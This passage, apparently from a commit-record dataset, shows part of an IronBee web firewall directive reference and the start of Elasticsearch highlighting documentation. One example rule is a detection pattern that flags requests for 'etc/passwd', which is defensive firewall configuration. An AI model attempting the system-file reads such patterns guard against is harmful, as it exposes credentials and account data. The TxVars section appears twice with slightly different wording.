*actionableRulesOnly*\n* *none* - Alias for no data options\n* *all* - Alias for all data options\n* *default* - Alias for: *none*\n\nThe following filter options are supported:\n\n* *actionableRulesOnly* - Filter option indicating that only rules that\nwere actionable (actions executed) are logged - any rule-specific\nlogging is delayed\/suppressed until at least one action is executed.\n\n=== RuleEngineLogLevel\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the log level at which the rule engine writes logs.\n| Syntax|`RuleEngineLogLevel <level>`\n| Default|`info`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\n=== RuleExt\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a rule implemented externally, either by loading the rule directly from a file, or referencing a rule that was previously\ndeclared by a module.\n| Syntax|`RuleExt`\n| Default|None\n| Context|Site, Location\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nTo load a Lua rule:\n\n-------------------------------------------\nRuleExt lua:\/path\/to\/rule.lua phase:REQUEST\n-------------------------------------------\n\n=== RuleMarker\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a rule marker (placeholder) which will not be executed, but instead should be overridden.\n| Syntax|`RuleMarker id:<id> phase:<phase>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.5\n|===============================================================================\n\nCreates a rule marker (placeholder) which will not be executed, but instead should be\noverridden. The idea is that rule sets can include placeholders for optional custom\nrules which can be overridden, but still allow the rule set writer to maintain execution order.\n\nTo mark and later replace a rule:\n\n-------------------------------------------------------------------------------\nRule ARGS @rx foo id:1 rev:1 phase:REQUEST\n\n# Allow the administrator to set MY_VALUE in another context\nRuleMarker id:2 phase:REQUEST\n\nRule MY_VALUE @gt 0 id:3 rev:1 phase:REQUEST setRequestHeader:X-Foo:%{MY_VALUE}\n\n<Site test>\n Hostname *\n\n Rule &ARGS @gt 5 id:2 phase:REQUEST setvar:MY_VALUE=5\n RuleEnable all\n<\/Site>\n-------------------------------------------------------------------------------\n\nIn the above example, rule id:2 in the main context would be replaced by\nthe rule id:2 in the site context, then the rules would execute id:1,\nid:2 and id:3. 
If Rule id:2 was not replaced in the site context, then\nrules would execute id:1 then id:3 as id:2 is only a marker\n(placeholder).\n\n=== RuleTrace\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable rule tracing for a rule.\n| Syntax|`RuleTrace <rule-id>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|rules\n| Version|0.9\n|===============================================================================\n\n=== RuleTraceFile\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the rule tracing output file.\n| Syntax|`RuleTraceFile <trace-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|rules\n| Version|0.9\n|===============================================================================\n\n=== SQLiPatternSet\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Create a named libinjection pattern set from a file.\n| Syntax|`SQLiPatternSet <name> <pattern-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|rules\n| Version|0.9\n|===============================================================================\n\nThe pattern file is just a text file with one pattern per line.\n
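\nFor example, to load a custom pattern set that can then be referenced by\nname (a minimal sketch; the set name and file path are hypothetical):\n\n------------------------------------------------------\n# hypothetical pattern set\nSQLiPatternSet custom_sqli \/usr\/local\/ironbee\/sqli.txt\n------------------------------------------------------\n\n=== SensorHostname\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the sensor hostname.\n| Syntax|`SensorHostname <hostname>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis is just metadata about the sensor which is used in the audit log.\n\n=== SensorId\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Unique sensor identifier.\n| Syntax|`SensorId <id>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nTODO: Can we make this directive so that, if not defined, we attempt to\ndetect server hostname and use that as ID?\n\n=== SensorName\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Sensor name.\n| Syntax|`SensorName <name>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis is just metadata about the sensor which is used in the audit log.\n\n=== Service\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Maps IP and Port to a site.\n| Syntax|`Service <ip>:<port>`\n| Default|`*:*` (any)\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.6\n|===============================================================================\n\nThe `Service` directive establishes a mapping between a Site and one or\nmore IP\/Port pairs. 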
To map hostnames to a Site, see the `Hostname` directive.\n\nIn the simplest case, a site will occupy a single IP\/Port pair:\n\n-----------------------\nService 192.168.32.5:80\n-----------------------\n\nMore often than not, however, several mappings will be used:\n\n------------------------\nService 192.168.32.5:80\nService 192.168.32.6:443\n------------------------\n\nWildcards are permitted for both IP and Port:\n\n----------------------\nService *:80\nService 192.168.32.5:*\n----------------------\n\nTo match any IP address on any Port (which you will need to do in\ndefault sites), use wildcards for both IP and Port, which is the default\nif no `Service` directive is specified for a site:\n\n-----------\nService *:*\n-----------\n\n=== Set\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Set a named configuration parameter.\n| Syntax|`Set <name> <value>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n.Example\n----------------------------------------------\nSet MY_VAR \"some value\"\n----------------------------------------------\n\n=== Site\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a site.\n| Syntax|`<Site name>...<\/Site>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|core\n| Version|0.1\n|===============================================================================\n\nA site is one of the main concepts in the configuration in IronBee. The idea\nis to have an element to correspond to real-life web sites. With most web\nsites there is a one-to-one mapping to domain names, but our mapping mechanism\nis quite flexible: you can have one site per domain name, many domain names for\na single site, or even have one domain name shared among several sites.\n\nAt the highest level, a configuration will contain one or more sites.\nFor example:\n\n----------------------------------------\n<Site site1>\n Service *:80\n Hostname site1.example.com\n Hostname site1-alternate.example.com\n<\/Site>\n\n<Site site2>\n Service *:80\n Service 10.0.1.2:443\n Hostname site2.example.com\n<\/Site>\n\n<Site default>\n Service *:*\n Hostname *\n<\/Site>\n----------------------------------------\n\nBefore it can process a transaction, IronBee will examine the current\nconfiguration looking for a site to assign the transaction to. Sites are\nprocessed in the configured order where the first matching site is\nchosen. A default site can be specified as the last site using wildcards\nwhen all previous sites fail to match. 
The `Site` directive only\nestablishes configuration boundaries and assigns a unique handle to each\nsite; the `Service` and `Hostname` directives are responsible for the\nmapping.\n\n=== SiteId\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Unique site identifier.\n| Syntax|`SiteId <id>`\n| Default|None\n| Context|Site\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nTODO: Can we make this directive so that, if not defined, we attempt to\ndetect site hostname and use that as ID?\n\n=== StreamInspect\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a streaming inspection rule, which inspects data as it becomes available, outside rule phases.\n| Syntax|`StreamInspect TARGET @op <param> ...`\n| Context|Site, Location\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nNormally, rules run in one of the available phases, which happen at\nstrategic points in the transaction lifecycle. Phase rules are convenient to\nwrite, because all the relevant data is available for inspection.\nHowever, there are situations when it is not possible to have access to\nall of the data in a phase. This is the case, for example, when a\nrequest body is very large, or when buffering is not allowed.\n\nStreaming rules are designed to operate in these circumstances. They are\nable to inspect data as it becomes available, be it a dozen bytes, or\na single byte.\n\nThe syntax of the `StreamInspect` directive is similar to that of `Rule`, but\nthere are several restrictions (a sketch follows the list):\n\n* Only one input can be used. This is because streaming rules attach to\na single data source.\n* The `phase` modifier cannot be used, as streaming rules operate\noutside of phases.\n* Only `REQUEST_BODY_STREAM` and `RESPONSE_BODY_STREAM` can be used as\ninputs.\n* Only the `pm` and `dfa` operators can be used.\n* Transformation functions are not yet supported.\n
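\nA minimal sketch of a streaming rule that watches the request body stream\nwith the `pm` operator (the pattern, id and rev are hypothetical):\n\n----------------------------------------------------------------\n# hypothetical pattern and rule id\nStreamInspect REQUEST_BODY_STREAM @pm \"etc\/passwd\" id:9001 rev:1\n----------------------------------------------------------------\n\n=== TrustedProxyIPs\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify a list of networks or IP addresses to trust for X-Forwarded-For handling.\n| Syntax|`TrustedProxyIPs <cidr> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|trusted_proxy\n| Version|0.9\n|===============================================================================\n\nThis is a list of IP addresses or CIDR blocks that should be trusted or\nnot trusted when handling the X-Forwarded-For header.\n\nNetworks\/IPs may be prefixed with \"+\" to indicate they are trusted or \"-\"\nto indicate they are untrusted. 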
If the first entry in the list does not have\na \"+\" or \"-\" the trusted\/untrusted list is cleared and the entry is\ntreated as trusted.\n\nExamples:\n\nTrust only 192.168.1.0\/24:\n\n----------------------------------------\nTrustedProxyIPs 192.168.1.0\/24\n----------------------------------------\n\nTrust all but 10.10.10.10:\n\n--------------------------------------\nTrustedProxyIPs -10.10.10.10\n--------------------------------------\n\n=== TrustedProxyUseXFFHeader\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable the use of the X-Forwarded-For header.\n| Syntax|`TrustedProxyUseXFFHeader On\\|Off`\n| Default|`On`\n| Context|Any\n|Cardinality|0..1\n| Module|trusted_proxy\n| Version|0.9\n|===============================================================================\n\nIf enabled, the last address listed in the X-Forwarded-For header is used as the\nremote address. See _TrustedProxyIPs_ to configure the list of trusted\nproxies. The default behaviour is to trust no proxies.\n\n=== TxDump\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Diagnostics directive to dump (log) transaction data for debugging purposes.\n| Syntax|`TxDump <event> <destination> [<data> ...]`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|devel\n| Version|0.7\n|===============================================================================\n\nThe event field allows indicating _when_ you want the data to be written\nand is one of:\n\n* *TxStarted* - Transaction started.\n* *TxProcess* - Transaction processing (between request and response).\n* *TxContext* - Transaction configuration context chosen.\n* *RequestStart* - Request started.\n* *RequestHeader* - Request headers have been processed.\n* *Request* - Full request has been processed.\n* *ResponseStart* - Response started.\n* *ResponseHeader* - Response headers have been processed.\n* *Response* - Full response has been processed.\n* *TxFinished* - Transaction is finished.\n* *Logging* - Logging phase.\n* *PostProcess* - Post-processing phase.\n\nThe destination field allows specifying _where_ you want to write the\ndata and is one of the following:\n\n* *stderr* - Write to standard error.\n* *stdout* - Write to standard output.\n* *ib* - Write to the IronBee log file.\n* *file:\/\/* - Write to an arbitrary file, optionally appending to the\nfile if the last character is a *+* character.\n\nThe data field is optional and allows specifying _what_ is to be\nwritten. 
This can be prefixed with a `+` or a `-` character to enable or\ndisable the data.\n\n* *Basic* - Basic TX data.\n* *Context* - Configuration context data.\n* *Connection* - Connection data.\n* *ReqLine* - HTTP request line.\n* *ReqHdr* - HTTP request header.\n* *RspLine* - HTTP response line.\n* *RspHdr* - HTTP response header.\n* *Flags* - Transaction flags.\n* *Args* - Request arguments.\n* *Data* - Transaction data.\n* *Default* - Default is \"Basic ReqLine RspLine\".\n* *Headers* - All HTTP headers.\n* *All* - All data.\n\nExamples:\n\n----------------------------------------------\nTxDump TxContext ib Basic +Context\nTxDump PostProcess file:\/\/\/tmp\/tx.txt All\nTxDump Logging file:\/\/\/var\/log\/ib\/all.txt+ All\nTxDump PostProcess stdout All\n----------------------------------------------\n\n=== TxLogEnabled\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/Disable the transaction log.\n| Syntax|`TxLogEnabled On \\| Off`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|txlog\n| Version|0.9\n|===============================================================================\n\n=== TxLogIronBeeLog\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable writing the transaction log to the IronBee log.\n| Syntax|`TxLogIronBeeLog`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|txlog\n| Version|0.9\n|===============================================================================\n
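\nFor example, to turn on transaction logging and mirror it into the IronBee\nlog (a minimal sketch):\n\n----------------\nTxLogEnabled On\nTxLogIronBeeLog\n----------------\n\n=== TxVars\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/Disable additional transaction vars for testing.\n| Syntax|`TxVars On \\| Off`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|txvars\n| Version|0.9\n|===============================================================================\n\nThis will enable additional vars (data fields)::\n* *ENGINE_ID* - Engine ID\n* *SENSOR_ID* - Sensor ID\n* *CONN_ID* - Connection ID\n* *CONN_START* - When the connection started\n* *TX_ID* - Transaction ID\n* *TX_START* - When the transaction started\n* *CONTEXT_NAME* - Name of the selected configuration context\n* *SITE_ID* - Selected site ID\n* *SITE_NAME* - Selected site name\n* *LOCATION_PATH* - Selected location path\n\n=== XRuleGeo\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended geo rule.\n| Syntax|`XRuleGeo`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. 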
=== TxVars\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/Disable additional transaction vars for testing.\n| Syntax|`TxVars On \\| Off`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|txvars\n| Version|0.9\n|===============================================================================\n\nThis will enable the following additional vars (data fields):\n\n* *ENGINE_ID* - Engine ID.\n* *SENSOR_ID* - Sensor ID.\n* *CONN_ID* - Connection ID.\n* *CONN_START* - When the connection started.\n* *TX_ID* - Transaction ID.\n* *TX_START* - When the transaction started.\n* *CONTEXT_NAME* - Name of the selected configuration context.\n* *SITE_ID* - Selected site ID.\n* *SITE_NAME* - Selected site name.\n* *LOCATION_PATH* - Selected location path.\n\n=== XRuleGeo\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended geo rule.\n| Syntax|`XRuleGeo`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleGeo is used to set up Geo (country) based rules.\n\nExample:\n--------------------------------------\nXRuleGeo US scaleThreat=0.8 priority=1\n--------------------------------------\n\nFor available actions, see `XRuleIpv4`.\n\n=== XRuleIpv4\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended IPv4 rule.\n| Syntax|`XRuleIpv4`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleIpv4 is used to set up IPv4 based rules.\n\nExample:\n-----------------------------------------\nXRuleIpv4 192.168.0.0\/16 block priority=1\n-----------------------------------------\n\nAvailable Actions:\n\n* *priority=N* - Set rule priority.\n* *block* - Block the transaction.\n* *allow* - Allow the transaction.\n* *enableBlockingMode* - Enable blocking mode for this transaction.\n* *disableBlockingMode* - Disable blocking mode for this transaction.\n* *scaleThreat=X* - Scale threat calculation (update\n*XRULES:SCALE_THREAT*) by floating point multiplier, X, for this\ntransaction.\n* *enableRequestHeaderInspection* - Enable request header inspection for\nthis transaction.\n* *disableRequestHeaderInspection* - Disable request header inspection\nfor this transaction.\n* *enableRequestURIInspection* - Enable request URI inspection for this\ntransaction.\n* *disableRequestURIInspection* - Disable request URI inspection for\nthis transaction.\n* *enableRequestParamInspection* - Enable request parameter inspection\nfor this transaction.\n* *disableRequestParamInspection* - Disable request parameter inspection\nfor this transaction.\n* *enableRequestBodyInspection* - Enable request body inspection for\nthis transaction.\n* *disableRequestBodyInspection* - Disable request body inspection for\nthis transaction.\n* *enableResponseHeaderInspection* - Enable response header inspection\nfor this transaction.\n* *disableResponseHeaderInspection* - Disable response header inspection\nfor this transaction.\n* *enableResponseBodyInspection* - Enable response body inspection for\nthis transaction.\n* *disableResponseBodyInspection* - Disable response body inspection for\nthis transaction.\n\n
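As an illustration of priority resolution (the addresses are arbitrary),\nthe second rule below wins for hosts in 10.1.0.0\/16 because its\nnumerical priority value is lower:\n\n--------------------------------------\nXRuleIpv4 10.0.0.0\/8 allow priority=10\nXRuleIpv4 10.1.0.0\/16 block priority=1\n--------------------------------------\n\n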
=== XRuleIpv6\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended IPv6 rule.\n| Syntax|`XRuleIpv6`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleIpv6 is used to set up IPv6 based rules.\n\nExample:\n----------------------------------\nXRuleIpv6 ::1\/128 block priority=1\n----------------------------------\n\nFor available actions, see `XRuleIpv4`.\n\n=== XRulePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended path rule.\n| Syntax|`XRulePath`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRulePath is used to set up URI path based rules.\n\nExample:\n--------------------------------------------------------------\nXRulePath \/admin scaleThreat=1.5 enableBlockingMode priority=1\n--------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`.\n\n=== XRuleRequestContentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended request content type rule.\n| Syntax|`XRuleRequestContentType`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleRequestContentType is used to set up request content type based\nrules.\n\nExample:\n-------------------------------------------------------------------------------------\nXRuleRequestContentType application\/x-www-form-urlencoded enableRequestBodyInspection\n-------------------------------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`.\n\n=== XRuleResponseContentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended response content type rule.\n| Syntax|`XRuleResponseContentType`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleResponseContentType is used to set up response content type based\nrules.\n\nExample:\n----------------------------------------------------------------\nXRuleResponseContentType image\/png disableResponseBodyInspection\n----------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`.\n\n=== XRuleTime\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended time rule.\n| Syntax|`XRuleTime`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleTime is used to set up date\/time based rules.\n\nThe time-spec is in the format: `[!]DOW(,DOW)*@HH:MM-HH:MM[-|+]ZZZZ`:\n\n* *!* - Invert rule.\n* *DOW* - Day of Week (0=Sunday - 6=Saturday).\n* *HH* - Two digit hour (24-hr format).\n* *MM* - Two digit minute.\n* *[-|+]ZZZZ* - Timezone offset from GMT.\n\nExample:\n------------------------------------------------------------------------\nXRuleTime !1,2,3,4,5@08:00-17:00-0500 scaleThreat=1.5 enableBlockingMode\n------------------------------------------------------------------------\n\n
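Reading the example above against the format: `!` inverts the match,\n`1,2,3,4,5` selects Monday through Friday, `08:00-17:00` is the time\nwindow and `-0500` is the GMT offset - so this rule raises the threat\nscore and enables blocking only _outside_ weekday business hours in\nthat timezone.\n\n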
For available actions, see `XRuleIpv4`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb1694a18ee6f6885587361193936d8ed008ca36","subject":"Docs: Added IDs to the highlighters for linking","message":"Docs: Added IDs to the highlighters for linking\n","repos":"aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch","old_file":"docs\/reference\/search\/request\/highlighting.asciidoc","new_file":"docs\/reference\/search\/request\/highlighting.asciidoc","new_contents":"[[search-request-highlighting]]\n=== Highlighting\n\nAllows highlighting search results on one or more fields. The\nimplementation uses either the Lucene `highlighter`, `fast-vector-highlighter`\nor `postings-highlighter`. The following is an example of the search request\nbody:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {}\n }\n }\n}\n--------------------------------------------------\n\nIn the above case, the `content` field will be highlighted for each\nsearch hit (there will be another element in each search hit, called\n`highlight`, which includes the highlighted fields and the highlighted\nfragments).\n\nIn order to perform highlighting, the actual content of the field is\nrequired. If the field in question is stored (has `store` set to `true`\nin the mapping) it will be used, otherwise, the actual `_source` will\nbe loaded and the relevant field will be extracted from it.\n\nThe field name supports wildcard notation. For example, using `comment_*`\nwill cause all fields that match the expression to be highlighted.\n\n
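For instance, a minimal sketch that highlights every field whose name\nstarts with `comment_`:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"comment_*\" : {}\n }\n }\n}\n--------------------------------------------------\n\n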
[[postings-highlighter]]\n==== Postings highlighter\n\nIf `index_options` is set to `offsets` in the mapping the postings highlighter\nwill be used instead of the plain highlighter. The postings highlighter:\n\n* Is faster since it doesn't require reanalyzing the text to be highlighted:\nthe larger the documents the better the performance gain should be\n* Requires less disk space than term_vectors, needed for the fast vector\nhighlighter\n* Breaks the text into sentences and highlights them. Plays really well with\nnatural languages, not as well with fields containing for instance html markup\n* Treats the document as the whole corpus, and scores individual sentences as\nif they were documents in this corpus, using the BM25 algorithm\n\nHere is an example of setting the `content` field to allow for\nhighlighting using the postings highlighter on it:\n\n[source,js]\n--------------------------------------------------\n{\n \"type_name\" : {\n \"content\" : {\"index_options\" : \"offsets\"}\n }\n}\n--------------------------------------------------\n\n[NOTE]\nNote that the postings highlighter is meant to perform simple query terms\nhighlighting, regardless of their positions. That means that when used for\ninstance in combination with a phrase query, it will highlight all the terms\nthat the query is composed of, regardless of whether they are actually part of\na query match, effectively ignoring their positions.\n\n[WARNING]\nThe postings highlighter does support highlighting of multi term queries, like\nprefix queries, wildcard queries and so on. On the other hand, this requires\nthe queries to be rewritten using a proper\n<<query-dsl-multi-term-rewrite,rewrite method>> that supports multi term\nextraction, which is a potentially expensive operation.\n\n[[fast-vector-highlighter]]\n==== Fast vector highlighter\n\nIf `term_vector` information is provided by setting `term_vector` to\n`with_positions_offsets` in the mapping then the fast vector highlighter\nwill be used instead of the plain highlighter. The fast vector highlighter:\n\n* Is faster especially for large fields (> `1MB`)\n* Can be customized with `boundary_chars`, `boundary_max_scan`, and\n `fragment_offset` (see <<boundary-characters,below>>)\n* Requires setting `term_vector` to `with_positions_offsets` which\n increases the size of the index\n* Can combine matches from multiple fields into one result. See\n `matched_fields`\n* Can assign different weights to matches at different positions allowing\n for things like phrase matches being sorted above term matches when\n highlighting a Boosting Query that boosts phrase matches over term matches\n\nHere is an example of setting the `content` field to allow for\nhighlighting using the fast vector highlighter on it (this will cause\nthe index to be bigger):\n\n[source,js]\n--------------------------------------------------\n{\n \"type_name\" : {\n \"content\" : {\"term_vector\" : \"with_positions_offsets\"}\n }\n}\n--------------------------------------------------\n\n
==== Force highlighter type\n\nThe `type` field allows forcing a specific highlighter type. This is useful\nfor instance when you need to use the plain highlighter on a field that has\n`term_vectors` enabled. The allowed values are: `plain`, `postings` and `fvh`.\nThe following is an example that forces the use of the plain highlighter:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\"type\" : \"plain\"}\n }\n }\n}\n--------------------------------------------------\n\n==== Force highlighting on source\n\nadded[1.0.0.RC1]\n\nForces the highlighting to highlight fields based on the source even if fields are\nstored separately. Defaults to `false`.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\"force_source\" : true}\n }\n }\n}\n--------------------------------------------------\n\n[[tags]]\n==== Highlighting Tags\n\nBy default, the highlighting will wrap highlighted text in `<em>` and\n`<\/em>`. This can be controlled by setting `pre_tags` and `post_tags`,\nfor example:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"pre_tags\" : [\"<tag1>\"],\n \"post_tags\" : [\"<\/tag1>\"],\n \"fields\" : {\n \"_all\" : {}\n }\n }\n}\n--------------------------------------------------\n\nWhen using the fast vector highlighter there can be more tags, and the \"importance\"\nis ordered.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"pre_tags\" : [\"<tag1>\", \"<tag2>\"],\n \"post_tags\" : [\"<\/tag1>\", \"<\/tag2>\"],\n \"fields\" : {\n \"_all\" : {}\n }\n }\n}\n--------------------------------------------------\n\nThere are also built-in \"tag\" schemas; currently there is a single schema\ncalled `styled` with the following `pre_tags`:\n\n[source,js]\n--------------------------------------------------\n<em class=\"hlt1\">, <em class=\"hlt2\">, <em class=\"hlt3\">,\n<em class=\"hlt4\">, <em class=\"hlt5\">, <em class=\"hlt6\">,\n<em class=\"hlt7\">, <em class=\"hlt8\">, <em class=\"hlt9\">,\n<em class=\"hlt10\">\n--------------------------------------------------\n\nand `<\/em>` as `post_tags`. If you think of other nice-to-have built-in tag\nschemas, just send an email to the mailing list or open an issue. Here\nis an example of switching tag schemas:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"tags_schema\" : \"styled\",\n \"fields\" : {\n \"content\" : {}\n }\n }\n}\n--------------------------------------------------\n\n\n==== Encoder\n\nAn `encoder` parameter can be used to define how highlighted text will\nbe encoded. It can be either `default` (no encoding) or `html` (will\nescape html, if you use html highlighting tags).\n\n
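For example, a minimal sketch that HTML-escapes the highlighted field\ncontent:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"encoder\" : \"html\",\n \"fields\" : {\n \"content\" : {}\n }\n }\n}\n--------------------------------------------------\n\n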
==== Highlighted Fragments\n\nEach field highlighted can control the size of the highlighted fragment\nin characters (defaults to `100`), and the maximum number of fragments\nto return (defaults to `5`).\nFor example:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\"fragment_size\" : 150, \"number_of_fragments\" : 3}\n }\n }\n}\n--------------------------------------------------\n\nThe `fragment_size` is ignored when using the postings highlighter, as it\noutputs sentences regardless of their length.\n\nOn top of this it is possible to specify that highlighted fragments need\nto be sorted by score:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"order\" : \"score\",\n \"fields\" : {\n \"content\" : {\"fragment_size\" : 150, \"number_of_fragments\" : 3}\n }\n }\n}\n--------------------------------------------------\n\nIf the `number_of_fragments` value is set to `0` then no fragments are\nproduced; instead, the whole content of the field is returned, and of\ncourse it is highlighted. This can be very handy if short texts (like\ndocument title or address) need to be highlighted but no fragmentation\nis required. Note that `fragment_size` is ignored in this case.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"_all\" : {},\n \"bio.title\" : {\"number_of_fragments\" : 0}\n }\n }\n}\n--------------------------------------------------\n\nWhen using the `fast-vector-highlighter` one can use the `fragment_offset`\nparameter to control the margin to start highlighting from.\n\nIn the case where there is no matching fragment to highlight, the default is\nto not return anything. Instead, we can return a snippet of text from the\nbeginning of the field by setting `no_match_size` (default `0`) to the length\nof the text that you want returned. The actual length may be shorter than\nspecified as it tries to break on a word boundary. When using the postings\nhighlighter it is not possible to control the actual size of the snippet,\ntherefore the first sentence gets returned whenever `no_match_size` is\ngreater than `0`.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\n \"fragment_size\" : 150,\n \"number_of_fragments\" : 3,\n \"no_match_size\": 150\n }\n }\n }\n}\n--------------------------------------------------\n\n\n==== Highlight 